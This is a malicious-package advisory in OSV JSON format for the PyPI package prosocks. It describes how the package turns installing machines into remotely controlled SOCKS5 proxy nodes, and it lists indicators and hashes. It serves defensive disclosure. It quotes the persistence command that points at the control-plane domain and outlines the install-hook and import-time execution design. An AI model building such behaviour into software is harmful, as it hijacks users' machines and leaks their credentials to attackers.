{"id":"MAL-2026-17167","summary":"Malicious code in prosocks (PyPI)","details":"\n---\n_-= Per source details. Do not edit below this line.=-_\n\n## Source: amazon-inspector (cb2bf0fd5f445eed9825601f2b4497502054176d106d4fecb9eabf38312dd582)\nprosocks 1.0.25 enrolls the installer's host as a remote-controlled SOCKS5 exit node under a hardcoded control plane at https://kalnetz.store. setup.py's custom install command writes prosocks.bat into the Windows Startup folder (establishing boot persistence) with the command '\"{python_exe}\" -m prosocks https://kalnetz.store' and immediately spawns that process during `pip install`. The top-level module additionally calls _auto_launch() so that any `import prosocks` spawns a detached subprocess running the same agent. Once running, ProSocksAgent.register() queries ip-api.com and api.ipify.org for the host's public IP, generates an agent_id and proxy password, and POSTs agent_id, hostname, public IP, proxy port, and password to https://kalnetz.store/api/register, then binds a SOCKS5 server on 0.0.0.0:9050 accessible from any network the host can reach. Heartbeat and bandwidth telemetry are POSTed to /api/heartbeat and /api/bandwidth, and IP changes trigger re-registration. All requests to the panel and IP-lookup services are made with TLS verification disabled (verify=False). The combination of install-time execution, import-time execution, Windows Startup persistence, hardcoded non-first-party control plane, and an unauthenticated SOCKS5 listener on all interfaces whose credentials are handed to that control plane matches a proxyware/botnet backdoor.\n\n## Source: kam193 (a1ca37b881f19975a8ab8b23bd5e69b51355333374385aabfc5784b69bf95545)\nThe package automatically joins the machine to a proxy network. Depending on the version, it can happen during the package installation or when importing the module.\n\n\n---\n\nCategory: MALICIOUS - The campaign has clearly malicious intent, like infostealers.\n\n\nCampaign: 2026-09-prosocks\n\n\nReasons (based on the campaign):\n\n\n - other\n\n\n - peristence-autorun\n\n\n - persistence\n","modified":"2026-09-25T03:00:06.522127273Z","published":"2026-09-24T20:27:37Z","database_specific":{"iocs":{"domains":["kalnetz.store"]},"malicious-packages-origins":[{"source":"kam193","versions":["1.0.0","1.0.1","1.0.2","1.0.3","1.0.4","1.0.5","1.0.6","1.0.7","1.0.8","1.0.9","1.0.13","1.0.14","1.0.15","1.0.16","1.0.17","1.0.18","1.0.19","1.0.20","1.0.21","1.0.22","1.0.23","1.0.25","1.0.26","1.0.27"],"id":"pypi/2026-09-prosocks/prosocks","import_time":"2026-09-24T21:17:51.820938555Z","modified_time":"2026-09-24T20:27:37.240742Z","sha256":"a1ca37b881f19975a8ab8b23bd5e69b51355333374385aabfc5784b69bf95545"},{"source":"amazon-inspector","versions":["1.0.22"],"id":"IN-MAL-2026-020530","import_time":"2026-09-25T02:45:28.491373497Z","modified_time":"2026-09-25T02:38:41Z","sha256":"76e0eae860e10e88d75ea8b07c167738b690efd073a617896ea5ad6a0792c755"},{"id":"IN-MAL-2026-020539","import_time":"2026-09-25T02:45:28.779169994Z","modified_time":"2026-09-25T02:40:07Z","sha256":"8f29f98ed08ae514405c11088ba947720af42c40dfe1c27366150cd5bac7f347","source":"amazon-inspector","versions":["1.0.13"]},{"versions":["1.0.32"],"id":"IN-MAL-2026-020547","import_time":"2026-09-25T02:45:29.000691993Z","modified_time":"2026-09-25T02:41:14Z","sha256":"aa6a62b2bc3bb7b72b4be1eabd9a18855746a708a75e60e2ee5b69eb1a7d428d","source":"amazon-inspector"},{"versions":["1.0.18"],"id":"IN-MAL-2026-020540","import_time":"2026-09-25T02:45:28.803991112Z","modified_time":"2026-09-25T02:40:15Z","sha256":"bddc16df6cd97016b03613b0145b94bd73d832dfd439af5b5d2fd123a7aa1aa2","source":"amazon-inspector"},{"import_time":"2026-09-25T02:45:28.642912922Z","modified_time":"2026-09-25T02:39:21Z","sha256":"000f63ce0bd21488923efbf77dfcc4cbba6f35e870cff786b508f775a53b5196","source":"amazon-inspector","versions":["1.0.23"],"id":"IN-MAL-2026-020534"},{"id":"IN-MAL-2026-020535","import_time":"2026-09-25T02:45:28.668915916Z","modified_time":"2026-09-25T02:39:29Z","sha256":"37b5a9fa3464dc2a2b48c44d832f66309a50cc91529e52dc4dee6bfe1b4aa69f","source":"amazon-inspector","versions":["1.0.19"]},{"id":"IN-MAL-2026-020528","import_time":"2026-09-25T02:45:28.407650176Z","modified_time":"2026-09-25T02:38:20Z","sha256":"cb2bf0fd5f445eed9825601f2b4497502054176d106d4fecb9eabf38312dd582","source":"amazon-inspector","versions":["1.0.25"]},{"modified_time":"2026-09-25T02:39:40Z","sha256":"409e4363b70e5d2e1194b484c55842d42d6feabd4219604a8bf28d6d5386690a","source":"amazon-inspector","versions":["1.0.20"],"id":"IN-MAL-2026-020536","import_time":"2026-09-25T02:45:28.697878755Z"},{"id":"IN-MAL-2026-020537","import_time":"2026-09-25T02:45:28.721905139Z","modified_time":"2026-09-25T02:39:47Z","sha256":"870b800018606622dc818d3f1bea56a620e37255f2f0c0d6c90e08fdeec9ed35","source":"amazon-inspector","versions":["1.0.17"]},{"source":"amazon-inspector","versions":["1.0.28"],"id":"IN-MAL-2026-020548","import_time":"2026-09-25T02:45:29.025826713Z","modified_time":"2026-09-25T02:41:24Z","sha256":"caa7416059850559330a9960c6b769b1f60fc84ece462205638a7b88599a7eb8"},{"modified_time":"2026-09-25T02:38:11Z","sha256":"d49a320dd58a4870230ae0ca5064f62cc944ba54e0b4826942544ae72f5addd7","source":"amazon-inspector","versions":["1.0.26"],"id":"IN-MAL-2026-020527","import_time":"2026-09-25T02:45:28.384228105Z"},{"versions":["1.0.29"],"id":"IN-MAL-2026-020544","import_time":"2026-09-25T02:45:28.915488658Z","modified_time":"2026-09-25T02:40:49Z","sha256":"23054a22019d252872e2388241e5b3a2316d375f3339b7d29e91509d906c4ba7","source":"amazon-inspector"},{"source":"amazon-inspector","versions":["1.0.21"],"id":"IN-MAL-2026-020533","import_time":"2026-09-25T02:45:28.617646638Z","modified_time":"2026-09-25T02:39:13Z","sha256":"45fadb3326809bdbd1ffe08b9406d56368185ee3e3e4a0b1bdde76016ecd9a7d"},{"source":"amazon-inspector","versions":["1.0.30"],"id":"IN-MAL-2026-020545","import_time":"2026-09-25T02:45:28.943705042Z","modified_time":"2026-09-25T02:40:58Z","sha256":"ca84a489288e0d475797752133d56030bdd562f28d97500e3584d5cb54a74148"},{"sha256":"367e20039ff925711e169e6c72923dd980abe616b8b8ec85eed30d4110942b4f","source":"amazon-inspector","versions":["1.0.27"],"id":"IN-MAL-2026-020529","import_time":"2026-09-25T02:45:28.4655852Z","modified_time":"2026-09-25T02:38:31Z"}]},"references":[{"type":"WEB","url":"https://bad-packages.kam193.eu/pypi/package/prosocks"},{"type":"PACKAGE","url":"https://pypi.org/project/prosocks/1.0.22/"},{"type":"PACKAGE","url":"https://pypi.org/project/prosocks/1.0.13/"},{"type":"PACKAGE","url":"https://pypi.org/project/prosocks/1.0.32/"},{"type":"PACKAGE","url":"https://pypi.org/project/prosocks/1.0.18/"},{"type":"PACKAGE","url":"https://pypi.org/project/prosocks/1.0.23/"},{"type":"PACKAGE","url":"https://pypi.org/project/prosocks/1.0.19/"},{"type":"PACKAGE","url":"https://pypi.org/project/prosocks/1.0.25/"},{"type":"PACKAGE","url":"https://pypi.org/project/prosocks/1.0.20/"},{"type":"PACKAGE","url":"https://pypi.org/project/prosocks/1.0.17/"},{"type":"PACKAGE","url":"https://pypi.org/project/prosocks/1.0.28/"},{"type":"PACKAGE","url":"https://pypi.org/project/prosocks/1.0.26/"},{"type":"PACKAGE","url":"https://pypi.org/project/prosocks/1.0.29/"},{"type":"PACKAGE","url":"https://pypi.org/project/prosocks/1.0.21/"},{"type":"PACKAGE","url":"https://pypi.org/project/prosocks/1.0.30/"},{"type":"PACKAGE","url":"https://pypi.org/project/prosocks/1.0.27/"}],"affected":[{"package":{"name":"prosocks","ecosystem":"PyPI","purl":"pkg:pypi/prosocks"},"versions":["1.0.0","1.0.1","1.0.2","1.0.3","1.0.4","1.0.5","1.0.6","1.0.7","1.0.8","1.0.9","1.0.13","1.0.14","1.0.15","1.0.16","1.0.17","1.0.18","1.0.19","1.0.20","1.0.21","1.0.22","1.0.23","1.0.25","1.0.26","1.0.27","1.0.32","1.0.28","1.0.29","1.0.30"],"database_specific":{"cwes":[{"name":"Embedded Malicious Code","cweId":"CWE-506","description":"The product contains code that appears to be malicious in nature."},{"name":"Embedded Malicious Code","cweId":"CWE-506","description":"The product contains code that appears to be malicious in nature."},{"description":"The product contains code that appears to be malicious in nature.","name":"Embedded Malicious Code","cweId":"CWE-506"},{"description":"The product contains code that appears to be malicious in nature.","name":"Embedded Malicious Code","cweId":"CWE-506"},{"name":"Embedded Malicious Code","cweId":"CWE-506","description":"The product contains code that appears to be malicious in nature."},{"description":"The product contains code that appears to be malicious in nature.","name":"Embedded Malicious Code","cweId":"CWE-506"},{"name":"Embedded Malicious Code","cweId":"CWE-506","description":"The product contains code that appears to be malicious in nature."},{"cweId":"CWE-506","description":"The product contains code that appears to be malicious in nature.","name":"Embedded Malicious Code"},{"description":"The product contains code that appears to be malicious in nature.","name":"Embedded Malicious Code","cweId":"CWE-506"},{"description":"The product contains code that appears to be malicious in nature.","name":"Embedded Malicious Code","cweId":"CWE-506"},{"name":"Embedded Malicious Code","cweId":"CWE-506","description":"The product contains code that appears to be malicious in nature."},{"description":"The product contains code that appears to be malicious in nature.","name":"Embedded Malicious Code","cweId":"CWE-506"},{"description":"The product contains code that appears to be malicious in nature.","name":"Embedded Malicious Code","cweId":"CWE-506"},{"cweId":"CWE-506","description":"The product contains code that appears to be malicious in nature.","name":"Embedded Malicious Code"},{"cweId":"CWE-506","description":"The product contains code that appears to be malicious in nature.","name":"Embedded Malicious Code"}],"indicators":{"package_integrity":[{"filename":"prosocks-1.0.22-py3-none-any.whl","hashes":{"md5":"969239bdda594fef437704e5e716a113","sha256":"3803ebd4d544b4f5a72408edfaa03fb586fdaacaa7cf6dfa37777ebf6b397520","blake2b_256":"1429615116396984a5e55879c1e85c3da7d018d604bf132cf7e000ffca0ac712"}},{"hashes":{"blake2b_256":"cf40d567a0e466c45e56aa9b8e003ff959cc6734691bd6e4a4ccbefd4716dd53","md5":"276fa254d49e89bcee722564b084a8ee","sha256":"3bd6f1e0cf535577b8185a51761f1b09fca1dd89b5b64a2a92dc2133b119e9c6"},"filename":"prosocks-1.0.22.tar.gz"}],"evidence_files":[{"tlsh":"51624345e4154ca6c28b851ac423b6573b9eb9070a4f643cb8fce3886f9413561f9ef6","path":"prosocks.py","sha256":"36e4b6471122c9d7adf077850e052721b68b19e2e8c4a29446f84bc383fad0dc"},{"sha256":"1e1f7b6e7c501565e08841ff785e48587698b4355bd8883473ca26545e08ee5c","tlsh":"24212167c87f653445c283a1585f29261beb82134f08e8e478ed52640fcf03e846c76b","path":"setup.py"}]},"source":"https://github.com/ossf/malicious-packages/blob/main/osv/malicious/pypi/prosocks/MAL-2026-17167.json"}}],"schema_version":"1.9.0","credits":[{"name":"Amazon Inspector","contact":["inspector-research@amazon.com"],"type":"FINDER"},{"name":"Kamil Mańkowski (kam193)","contact":["https://github.com/kam193","https://bad-packages.kam193.eu/"],"type":"ANALYST"}]}